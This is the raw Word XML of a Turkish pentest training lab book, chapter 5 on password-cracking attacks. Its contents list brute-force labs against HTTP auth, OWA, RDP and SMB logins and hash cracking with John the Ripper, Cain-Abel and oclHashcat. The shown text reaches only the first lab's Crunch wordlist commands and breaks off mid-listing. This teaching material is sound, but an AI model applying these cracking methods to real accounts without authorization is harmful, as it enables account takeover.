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A923" w14:textId="2766F02A" w:rsidR="00E32884" w:rsidRPr="00DC3982" w:rsidRDefault="00C656DC" w:rsidP="00DC3982">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00C656DC">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Batang" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:noProof/>
          <w:color w:val="365F91"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="96"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30C41ED3" wp14:editId="3552E567">
            <wp:extent cx="4140835" cy="2760556"/>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_Yeni_Logo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0835" cy="2760556"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="138F8E0B" w14:textId="77777777" w:rsidR="00E32884" w:rsidRDefault="00E32884" w:rsidP="00C656DC">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59A34170" w14:textId="77777777" w:rsidR="00DC3982" w:rsidRDefault="00C656DC" w:rsidP="00DC3982">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E32884">
        <w:rPr>
          <w:b/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">PENTEST EĞİTİMİ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0548E5CF" w14:textId="67123928" w:rsidR="00C656DC" w:rsidRDefault="00DC3982" w:rsidP="00DC3982">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>UYGULAMA</w:t>
      </w:r>
      <w:r w:rsidR="00C656DC" w:rsidRPr="00E32884">
        <w:rPr>
          <w:b/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> KİTABI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41279AB5" w14:textId="77777777" w:rsidR="00DC3982" w:rsidRDefault="00DC3982" w:rsidP="00DC3982">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48377564" w14:textId="36A062AD" w:rsidR="00397BDB" w:rsidRDefault="00053A9F" w:rsidP="00397BDB">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>BÖLÜM - 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A4F750" w14:textId="77777777" w:rsidR="00784480" w:rsidRDefault="00784480" w:rsidP="00C656DC">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BB08BFB" w14:textId="77777777" w:rsidR="00C656DC" w:rsidRPr="00C656DC" w:rsidRDefault="00C656DC" w:rsidP="00C656DC">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C656DC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="415447CF" w14:textId="45481DC6" w:rsidR="00BB7D68" w:rsidRDefault="00BB7D68" w:rsidP="00397BDB">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB7D68">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US" w:bidi="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>İÇİNDEKİLER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E88B2DA" w14:textId="77777777" w:rsidR="00DD5E50" w:rsidRDefault="00DD5E50" w:rsidP="00DD5E50">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc430104846"/>
    </w:p>
    <w:p w14:paraId="37552691" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00902B70" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc430104855"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidRPr="00902B70">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>PAROLA KIRMA SALDIRILARI</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="58B563B6" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41BF318E" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00842D7A" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00842D7A">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BU KATEGORİDEKİ LAB UYGULAMA LİSTESİ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDCF8C3" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00842D7A" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E404B6C" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00842D7A" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidRPr="00842D7A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Crunch Kullanarak İsteğe Göre Sözlük Listesi Oluşturma</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639A4E5E" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00842D7A" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidRPr="00842D7A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Http Basic Auth Korumalı Sitelere Yönelik Brute Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BD47B6" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00842D7A" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidRPr="00842D7A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Cisco Type 5 Parolalarının Jtr Kullanılarak Kırılması</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4574E99C" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00842D7A" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidRPr="00842D7A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Cain-Abel Kullanarak Parola Kırma Saldırıları</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3132CD01" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidRPr="00842D7A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidRPr="00147513">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Parola Özetlerinin Kaba Kuvvet Saldırıları ile Kırılması </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EF7636" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidRPr="00842D7A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r w:rsidRPr="00147513">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">OclHashcat Kullanarak Parola Kırma Saldırıları </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719696BC" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00842D7A" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.7</w:t>
      </w:r>
      <w:r w:rsidRPr="00842D7A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00147513">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HTML Form Auth. Korumalı Sayfalara Yönelik Kaba Kuvvet Parola Denemeleri</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39218F14" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.8. </w:t>
      </w:r>
      <w:r w:rsidRPr="00147513">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fireforce Kullanarak Hedefe Yönelik Kaba Kuvvet Saldırısı Yapma</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577AB194" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00842D7A" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.9. Owa Hesaplarını Bruteforce i</w:t>
      </w:r>
      <w:r w:rsidRPr="00842D7A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>le Elegeçirme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FB6744" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00842D7A" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidRPr="00842D7A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10. Windows Hesapl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>arını Rdp Üzerinden Bruteforce i</w:t>
      </w:r>
      <w:r w:rsidRPr="00842D7A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>le Elegeçirme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB54FC6" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00842D7A" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidRPr="00842D7A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>11. Windows Hesapl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>arını Smb Üzerinden Bruteforce i</w:t>
      </w:r>
      <w:r w:rsidRPr="00842D7A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>le Elegeçirme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C26859" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00842D7A" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidRPr="00842D7A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>12. Offline Windows Parola Elde Etme Çalışmaları</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6229FD44" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00902B70" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00902B70">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE5F8DC" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc430104856"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">5.1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:t>Crunch Kullanarak İsteğe Göre Sözlük Listesi Oluşturma</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidRPr="00C37FB0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348903FD" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="076AC254" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Amaç: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Crunch ile istenilen formatta wordlist oluşturma </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25ADB396" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kullanılan Araçlar: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CF3545" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Crunch </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3B5F40" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73C1E327" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Adımlar: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70344541" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1.Adım: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Backtrack linux işletim sistemi üzerinde kurulu gelen crunch'a ilgili path takip edilerek erişilebilir;</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TabloKlavuzu"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9062"/>
      </w:tblGrid>
      <w:tr w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w14:paraId="39CD2B7C" w14:textId="77777777" w:rsidTr="00F069F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2051B2A5" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">root@bt:~/Desktop# cd /pentest/passwords/crunch/ </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="793F2A4C" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">root@bt:/pentest/passwords/crunch# ls </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="074694F5" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>charset.lst crunch GPL.TXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F09FB88" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D034ED3" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Burada charset.lst isimli dosya crunch ile birlikte kullanabileceğiniz karakter gruplarının tanımlandığı dosyadır. Örneğin yalnızca rakamların kullanılacaksa bu dosyada bu gruba verilen </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">numerics </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>charseti kullanılmalıdır. Charset.lst dosyasının içeriğinin bir kısmı aşağıdaki gibidir.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TabloKlavuzu"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9062"/>
      </w:tblGrid>
      <w:tr w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w14:paraId="3818E8A2" w14:textId="77777777" w:rsidTr="00F069F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="52F3B3E4" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">root@bt:/pentest/passwords/crunch# cat charset.lst </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A49175B" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"># charset configuration file for winrtgen v1.2 by Massimiliano Montoro (mao@oxid.it) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1111DC9F" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"># compatible with rainbowcrack 1.1 and later by Zhu Shuanglei &lt;shuanglei@hotmail.com&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75497C13" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
